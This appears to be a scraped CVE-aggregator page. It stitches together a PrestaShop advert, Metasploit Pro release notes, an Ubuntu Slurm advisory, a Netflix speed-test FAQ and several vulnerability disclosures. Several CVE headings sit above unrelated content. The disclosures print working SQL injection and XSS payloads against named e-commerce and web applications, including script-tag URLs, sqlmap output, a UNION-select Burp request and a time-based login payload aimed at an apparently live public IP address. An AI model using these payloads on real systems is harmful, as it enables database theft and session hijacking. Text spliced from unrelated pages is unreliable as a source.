PrestaShop module, totadministrativemandate before v1.7.1 was discovered to contain a SQL injection vulnerability.

**Your ecommerce.  
Your brand. Your rules.**

PrestaShop offers you a highly flexible and scalable ecommerce platform to launch an online business 100% owned and designed by you.

**Everything you need to sell products online**

All the ecommerce features you need, and more. With PrestaShop, develop your commerce online and grow your business.

**Customize your online store**

Personalize your ecommerce website: pick a theme, specific features, and everything your brand needs.

**Run your ecommerce website**

Manage everything from your website back office: product catalog, orders, payments, shipping, and data.

**Grow your revenue**

Scale your business with PrestaShop: launch marketing campaigns to reach more customers.

**Go international**

Sell across borders: conquer new markets with a multilanguage store and multicurrency options.

Take a look at what PrestaShop looks like from the back office.

**Join over 300,000 merchants**

“

Thanks to PrestaShop software, we were able to create a multilingual and multi-currency ecommerce site at a very reasonable total cost.

”

Chief Operating Officer, Bobbies

“

PrestaShop is a reliable software that has enabled us to constantly evolve our site over the last 6 years, all while allowing us to work independently, thanks to an intuitive back office.

”

Daan Sins

Co-founder, Huygens

“

PrestaShop is a handy, modular tool that allows us to continue to develop our omnichannel strategy.

”

Wassila Moussaoui

Digital Marketing and Communication Director, Pylones

**Be part of a thriving ecosystem**

PrestaShop is not only software, PrestaShop is also a thriving ecosystem of agencies, developers, and users.

Our partners are here to help

**Ready to sell online?**

Build your online store with PrestaShop in just a few clicks, or find the right expert to help you.

CVE-2022-46965: Create and build your online business with PrestaShop

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

*   Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
    
*   Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
    
*   PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
    
*   PR 16689 - Adds support for host addresses in kerberos tickets.
    
*   PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
    
*   PR 16749 - Adds Kerberos Authentication support to WinRM modules.
    
*   PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
    
*   PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
    
*   PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
    
*   PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
    
*   PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
    
*   PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
    
*   PR 17374 - Adds klist command support to list Kerberos tickets in the database.
    
*   PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
    
*   PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
    
*   PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
    
*   PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
    
*   PR 17475 - Enables the datastore\_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
    
*   PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
    
*   PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
    
*   PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
    
*   PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
    
*   PR 17535 - This adds NTLM hash recover to the kerberos/get\_ticket module.
    
*   PR 17539 - Adds additional error handling for Kerberos error codes.
    

*   Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
    
*   Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
    
*   PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
    
*   PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
    
*   PR 17482 - Fixes a connection issue with reverse\_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
    
*   PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
    
*   PR 17497 - This fixes an error where modules that issue certificates (icpr\_cert and now auxiliary/admin/dcerpc/cve\_2022\_26923\_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
    
*   PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
    
*   PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
    
*   PR 17541 - Fixes a crash that occurs when domain option is set to blank.
    
*   PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
    

*   PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require preauthnetication, i.e. AS-REP Roastable accounts, will have the hashes output for offline cracking.
    
*   PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
    
*   PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
    
*   PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
    
*   PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
    
*   PR 17533 - Enhances the auxiliary/admin/kerberos/get\_ticket module with PKINIT functionality.

CVE-2023-0599: Metasploit Release Notes

Ubuntu Security Notice 4781-2 - USN-4781-1 fixed several vulnerabilities in Slurm. This update provides the corresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. It was discovered that Slurm incorrectly handled certain messages between the daemon and the user. An attacker could possibly use this issue to assume control of an arbitrary file on the system. This issue only affected Ubuntu 16.04 ESM.

==========================================================================  
Ubuntu Security Notice USN-4781-2  
February 01, 2023

slurm-llnl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in Slurm.

Software Description:  
- slurm-llnl: Simple Linux Utility for Resource Management

Details:

USN-4781-1 fixed several vulnerabilities in Slurm. This update provides  
the corresponding updates for Ubuntu 14.04 ESM (CVE-2016-10030) and  
Ubuntu 16.04 ESM (CVE-2018-10995).

Original advisory details:

  It was discovered that Slurm incorrectly handled certain messages  
  between the daemon and the user. An attacker could possibly use this  
  issue to assume control of an arbitrary file on the system. This  
  issue only affected Ubuntu 16.04 ESM.  
  (CVE-2016-10030)

  It was discovered that Slurm mishandled SPANK environment variables.  
  An attacker could possibly use this issue to gain elevated privileges.  
  This issue only affected Ubuntu 16.04 ESM. (CVE-2017-15566)

  It was discovered that Slurm mishandled certain SQL queries. A local  
  attacker could use this issue to gain elevated privileges. This  
  issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and  
  Ubuntu 18.04 ESM. (CVE-2018-7033)

  It was discovered that Slurm mishandled user names and group ids. A local  
  attacker could use this issue to gain administrative privileges.  
  This issue only affected Ubuntu 14.04 ESM and Ubuntu 18.04 ESM.  
  (CVE-2018-10995)

  It was discovered that Slurm mishandled 23-bit systems. A local attacker  
  could use this to gain administrative privileges. This issue only affected  
  Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 ESM. (CVE-2019-6438)

  It was discovered that Slurm incorrectly handled certain inputs  
  when Message Aggregation is enabled. An attacker could possibly  
  use this issue to launch a process as an arbitrary user.  
  This issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 ESM  
  and Ubuntu 20.04 ESM. (CVE-2020-12693)

  It was discovered that Slurm incorrectly handled certain RPC inputs.  
  An attacker could possibly use this issue to execute arbitrary code.  
  This issue only affected Ubuntu 18.04 ESM and Ubuntu 20.04 ESM.  
  (CVE-2020-27745)

  Jonas Stare discovered that Slurm exposes sensitive information related  
  to the X protocol. An attacker could possibly use this issue to obtain  
  a graphical session from an arbitrary user. This issue only affected  
  Ubuntu 18.04 ESM and Ubuntu 20.04 ESM. (CVE-2020-27746)

  It was discovered that Slurm incorrectly handled environment parameters.  
  An attacker could possibly use this issue to execute arbitrary code.  
  (CVE-2021-31215)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   libpam-slurm                    15.08.7-1ubuntu0.1~esm5  
   libpmi0                         15.08.7-1ubuntu0.1~esm5  
   libslurm-perl                   15.08.7-1ubuntu0.1~esm5  
   libslurm29                      15.08.7-1ubuntu0.1~esm5  
   libslurmdb-perl                 15.08.7-1ubuntu0.1~esm5  
   libslurmdb29                    15.08.7-1ubuntu0.1~esm5  
   slurm-client                    15.08.7-1ubuntu0.1~esm5  
   slurm-client-emulator           15.08.7-1ubuntu0.1~esm5  
   slurm-llnl                      15.08.7-1ubuntu0.1~esm5  
   slurm-llnl-slurmdbd             15.08.7-1ubuntu0.1~esm5  
   slurm-wlm                       15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-basic-plugins         15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-emulator              15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-torque                15.08.7-1ubuntu0.1~esm5  
   slurmctld                       15.08.7-1ubuntu0.1~esm5  
   slurmd                          15.08.7-1ubuntu0.1~esm5  
   slurmdbd                        15.08.7-1ubuntu0.1~esm5  
   sview                           15.08.7-1ubuntu0.1~esm5

Ubuntu 14.04 ESM:  
   libpam-slurm                    2.6.5-1ubuntu0.1~esm6  
   libpmi0                         2.6.5-1ubuntu0.1~esm6  
   libslurm-perl                   2.6.5-1ubuntu0.1~esm6  
   libslurm26                      2.6.5-1ubuntu0.1~esm6  
   libslurmdb-perl                 2.6.5-1ubuntu0.1~esm6  
   libslurmdb26                    2.6.5-1ubuntu0.1~esm6  
   slurm-llnl                      2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-basic-plugins        2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-slurmdbd             2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-sview                2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-torque               2.6.5-1ubuntu0.1~esm6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-4781-2  
   https://ubuntu.com/security/notices/USN-4781-1  
   CVE-2016-10030, CVE-2018-10995

Ubuntu Security Notice USN-4781-2

eCommerce Marketplace Platform CMS version 1.7 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7             ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /categories/phones/categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI]GET parameter 'min_price' is vulnerable to SQLIGET parameter 'max_price' is vulnerable to SQLIGET parameter 'a4tech-brand[]' is vulnerable to SQLIGET parameter 'battery[]' is vulnerable to SQLIGET parameter 'display[]' is vulnerable to SQLIGET parameter 'performance[]' is vulnerable to SQLIGET parameter 'attribute3[]' is vulnerable to SQLI[-] Done

eCommerce Marketplace Platform CMS 1.7 SQL Injection

eCommerce Marketplace Platform CMS version 1.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'pg' is vulnerable to XSS/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsgPath: /categories/phonesGET parameter 'max_price' is vulnerable to XSS/categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwmPath: /categories/phonesGET parameter 'min_price' is vulnerable to XSS/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag[-] Done

eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

An arbitrary file write vulnerability in Serenissima Informatica Fast Checkin v1.0 allows unauthenticated attackers to upload malicious files in the web root of the application to gain access to the server via the web shell.

L’ **Offensive Security Team** di **Swascan** ha identificato **3** vulnerabilità sul prodotto.

**Serenissima Informatica SpA**

_Serenissima Informatica è un’azienda che si occupa dello sviluppo di soluzioni per la gestione di PMI, Hotel e catene alberghiere, ristoranti e GDO._

**FastCheckIn – descrizione prodotto**

_Il prodotto FastCheckin (Web Check-In)_ in particolare aiuta gli utenti di Hotel e catene alberghiere nella compilazione dei propri dati e nella gestione delle proprie prenotazione online.

**Technical summary**

L’Offensive Security Team di Swascan ha identificato importanti vulnerabilià su: _FastCheckIn_:

**Vulnerabilità**

**CWE-ID**

**CVSSv3.1 Vector String**

**CVSSv3.1 Base Score**

**Arbitrary File Write (non autenticato)**

CWE-22

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

**9.8 – Critical**

**SQL Injection (non autenticato)**

CWE-89

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**9.8 – Critical**

**Absolute/Relative Path Traversal (non autenticato)**

CWE-22

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**8.6 – High**

 Swascan ha scelto di non divulgare i dettagli tecnici della vulnerabilità.

Nella sezione seguente la Proof-of-Concept con evidenze offuscate sulle vulnerabilità riscontrate.

**Arbitrary File Write (non autenticato) – CVE-2022-47769****Descrizione**

L’applicazione risulta vulnerabile ad Arbitrary File Write. 

Un attaccante, remotamente e in modalità non autenticata, potrà scrivere nella web root dell’applicazione, qualsiasi file dal contenuto arbitrario per alterare e/o bloccare il funzionamento dell’applicativo oppure per ottenere l’accesso al server tramite web shell.

**Proof of Concept**

Si mostra di seguito come sia stato possibile scrivere una web shell nella web root dell’applicazione web ed ottenere accesso al server.

Per ottenere tale risultato sono stati effettuati i seguenti passaggi:

1.  Esecuzione di una HTTP Post Request per scrivere una WebShell (nell’esempio con il nome _70347276-ee93-4366-b396-e1496f67ed6d.aspx_ ) all’interno della web root;
2.  Esecuzione di comandi sul server tramite WebShell.

Evidenza 1 Richiesta HTTP contenente la WebShell

Il file C:\\\\FastCheckIn\\\\FastCI\\\\70347276-ee93-4366-b396-e1496f67ed6d.aspx è stato quindi creato con successo e raggiungibile dal web come mostrato nell’evidenza successiva:

Evidenza 2  Esecuzione tramite webshell del comando “whoami”

**Riferimenti**

https://cwe.mitre.org/data/definitions/20.html

http://cwe.mitre.org/data/definitions/22.html

https://owasp.org/www-community/attacks/Path\_Traversal

https://cheatsheetseries.owasp.org/cheatsheets/Input\_Validation\_Cheat\_Sheet.html

**SQL Injection (non autenticato) – CVE-2022-47770****Descrizione**

L’applicazione web è vulnerabile ad attacchi di tipo SQL Injection non autenticati.

Un potenziale attaccante sarà in grado accedere remotamente, completamente ed in maniera non autenticata alle informazioni contenute nella banca dati ed effettuare operazioni come esfiltrazione e modifica di account utente ed amministrativi, dati personali di utenti ed altre informazioni in essa contenute.

**Proof of Concept**

Si mostrano di seguito le evidenze della vulnerabilità e di come sia possibile estrarre informazioni sensibili dall’interno della banca dati.

Di seguito l’evidenza dell’enumerazione del DMBS, Microsoft SQL Server e la lista offuscata) di tutti i database presenti sul server:

Evidenza 4 SQLMap Lista database

Ciò conferma la presenza della vulnerabilità.

A fronte della corretta exploitation di questo tipo di vulnerabilità, un attaccante potrebbe acquisire i diritti di amministratore dell’applicativo web, con conseguente accesso a tutte le funzionalità del portale.

**Riferimenti**

https://www.owasp.org/index.php/SQL\_Injection

https://cwe.mitre.org/data/definitions/89.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://www.cve.org/CVERecord?id=CVE-2022-47770

**Path Traversal (non autenticato) – CVE-2022-47768****Descrizione**

La vulnerabilità Path Traversal (Relative e Absolute) consente l’accesso a file presenti nel sistema operativo che risiedono al di fuori della web root dell’applicazione. Manipolando le variabili che richiedono i file, attraverso l’uso dei caratteri “../” o di un path assoluto (eg. C:\\…) è possibile accedere arbitrariamente ai file e/o cartelle contenuti nel sistema operativo come il codice sorgente dell’applicazione o file sensibili che risiedono nella macchina.

**Proof of Concept**

Di seguito vengono mostrate le evidenze di come è possibile leggere il contenuto di file sul filesystem. Nell’esempio viene mostrata la possibilità di leggere il file c:\\windows\\win.ini:

Evidenza 5 Richiesta e Risposta HTTP della vulnerabilità Absolute Path Traversal

**Riferimenti**

https://cwe.mitre.org/data/definitions/22.html

https://cwe.mitre.org/data/definitions/23.html

https://owasp.org/Top10/A01\_2021-Broken\_Access\_Control/

https://owasp.org/www-community/attacks/Path\_Traversal

https://www.cve.org/CVERecord?id=CVE-2022-47768

**Remediation**

Swascan consiglia di non esporre l’applicativo su Internet o, qualora fosse necessario, di accedervi esclusivamente tramite connessione VPN in attesa che il vendor rilasci una patch o un aggiornamento.

**Disclosure Timeline**

*   07-08-2022: Scoperte le vulnerabilità
*   07-08-2022: Vendor contattato tramite mail (1° tentativo, nessuna risposta)
*   22-09-2022: Vendor contattato tramite mail (2° tentativo, con risposta)
*   22-09-2022: Invio del report contenente le vulnerabilità
*   11-01-2023: Swascan ricontatta il vendor per eventuale review del documento (nessuna risposta)
*   18-01-2023: Swasacan ricontatta il vendor per eventuale review (nessuna risposta)
*   31-01-2023: Swascan pubblica la vulnerabilità

CVE-2022-47769: Security Advisory: Serenissima Informatica – FastCheckIn (CVE-2022-47768/CVE-2022-47769/ CVE-2022-47770)

Serenissima Informatica Fast Checkin version v1.0 is vulnerable to Unauthenticated SQL Injection.

**What is FAST.com measuring?**

FAST.com speed test gives you an estimate of your current Internet speed. You will generally be able to get this speed from leading Internet services, which use globally distributed servers.

**Why does FAST.com focus primarily on download speed?**

Download speed is most relevant for people who are consuming content on the Internet, and we want FAST.com to be a very simple and fast speed test.

**What about ping, latency, upload and other things?**

When you click the “Show more info” button, you can see your upload speed and connection latency (ping). FAST.com provides two different latency measurements for your Internet connection: “unloaded” and “loaded” with traffic. The difference between these two measurements is also called “bufferbloat”.

**How are the results calculated?**

To calculate your Internet speed, FAST.com performs a series of downloads from and uploads to Netflix servers and calculates the maximum speed your Internet connection can provide. More details are in our blog post.

**Will the FAST.com speed test work everywhere in the world?**

FAST.com will test Internet speed globally on any device (phone, laptop, or smart TV with browser).

**Why is Netflix offering the FAST.com speed test?**

We want our members to have a simple, quick, ad-free way to estimate the Internet speed that their ISP is providing.

**What can I do if I'm not getting the speed I pay for?**

If results from FAST.com and other internet speed tests (like dslreports.com or speedtest.net) often show less speed than you have paid for, you can ask your ISP about the results.

CVE-2022-47770: Internet Speed Test

Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

EQ v1.5.31 to v2.2.0 was discovered to contain a SQL injection vulnerability via the UserPwd parameter.

**EQ**

Exploit Title:EQ企业管理系统

Version:EQ v1.5.31 to v2.2.0

Date:December 5, 2022

Exploit Author:TLF

analysis report: EQ企业管理系统 v1.5.31 to v2.2.0 was discovered to contain a SQL injection

poc

POST /Account/Login HTTP/1.1

Host: 121.8.146.131

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: application/json, text/javascript, /; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 61

Origin: http://121.8.146.131

Connection: close

Referer: http://121.8.146.131/Account/Login

Cookie: ASP.NET\_SessionId=v2svw4yucv1wxfah1zvwsyxy

UserNumber=admin';WAITFOR DELAY '0:0:5'--&UserPwd=123456&ServerDB=EQ&RememberPwd=false&UserPwd=123456&ServerDB=EQ&RememberPwd=false

Patches:None

Tag

#sql